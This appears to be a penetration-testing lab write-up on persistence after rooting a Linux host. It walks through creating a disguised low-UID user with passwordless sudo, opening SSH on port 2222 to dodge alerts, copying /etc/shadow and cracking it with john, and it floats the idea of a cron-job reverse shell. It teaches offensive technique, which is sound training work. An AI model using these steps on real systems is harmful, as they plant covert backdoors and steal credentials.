Privilege Escalation and Persistence POC

In this project, my task was to maintain persistence on a rooted machine.

Stepping Stones

After gaining root privileges to this target machine, my task was to establish a means of persistence so I could return to elevated privileges at any given time. This is an essential skill in penetration testing engagements, as many variables could affect that privilege in the blink of an eye. The network could go down and lose connection, a defender could notice an uncommon connection and block it, and whatever the case may be, the long and complicated attack path to compromise may not work a second time around so flawlessly. Because of this, persistence is key to moving further in the target network. My process in maintaing a foothold is listed below.

Creating a Shadow User

A simple command to add a shadow user is depicted below.

adduser --no-create-home sysd

It is important to name this account something generic and easy to blend into the Linux environment, and to especially ensure a home directory is NOT created. Enter a password after this command, and then change the user ID and group ID to the same number, as long as it is kept UNDER 1000.

usermod -u 562 sysd

usermod -g 562 sysd

The user ID numbers that are 1000 or over are usually indicative of user accounts, while anything under 1000 is a service account. This will ensure the shadow user can be interacted with from afar, but fly under the radar a little better and avoid suspicion.

After the shadow user is created and assigned ID numbers, it is time to grant it sudo privileges so elevated tasks can be performed upon reconnecting.

visudo

sysd ALL=(ALL:ALL) NOPASSWD: ALL

Be sure to add this line for permissions at the bottom of the visudo file. This will grant the necessary permissions to the shadow user without the necessity of entering a password for commands. The settings can be confirmed by running the following command:

su sysd --> sudo -l

SSH Configuration

To avoid a long and tedious exploit process to regain connection to the compromised machine, we better utilize SSH as a backdoor. In the /etc/ssh/sshd_config file, uncomment the line stating:

#Port 22

Then add an uncommented line under it stating:

Port 2222

This will utilize an uncommon port of 2222 to avoid suspicion and hopefully not trigger alerts on the defensive tools running throughout the network.

Reload the sshd service with the following commands, exit the root account, and then reconnect to the machine via SSH with the new shadow user created above.

systemctl reload sshd

ssh sysd@192.168.6.105 -p 2222

If all worked well, then persistence has now been achieved on this compromised machine.

Actions on Objectives

Now, with the newly privileged shadow user, cracking the remaining passwords on the system will allow a better chance at lateral movement throughout the network. Switch to the root user with sudo su, and then extract a copy of the shadow file to the attacking mahcine.

cat /etc/shadow | grep ':$5' > /etc/.etc_shadow_copy

sudo john etc_shadow_copy --wordlist=/usr/share/wordlists/rockyou.txt

Sit back, relax, and watch any cracked passwords roll in to be added to the cracked credentials file.

Theory

These techniques employed above are fantastic in a perfect world, but as security increases and security practitioners pick up on more patterns, some of the above techniques may be easily spotted. It is important to continue learning methods of persistence and keeping a well rounded skillset at all times. Maybe instead of relying on a service, a reverse shell script can be embedded in a cron job so it runs at a specific frequency and time. Whatever the technique may be, maintaing a foothold with persistence is just as important as obtaining it through exploitation.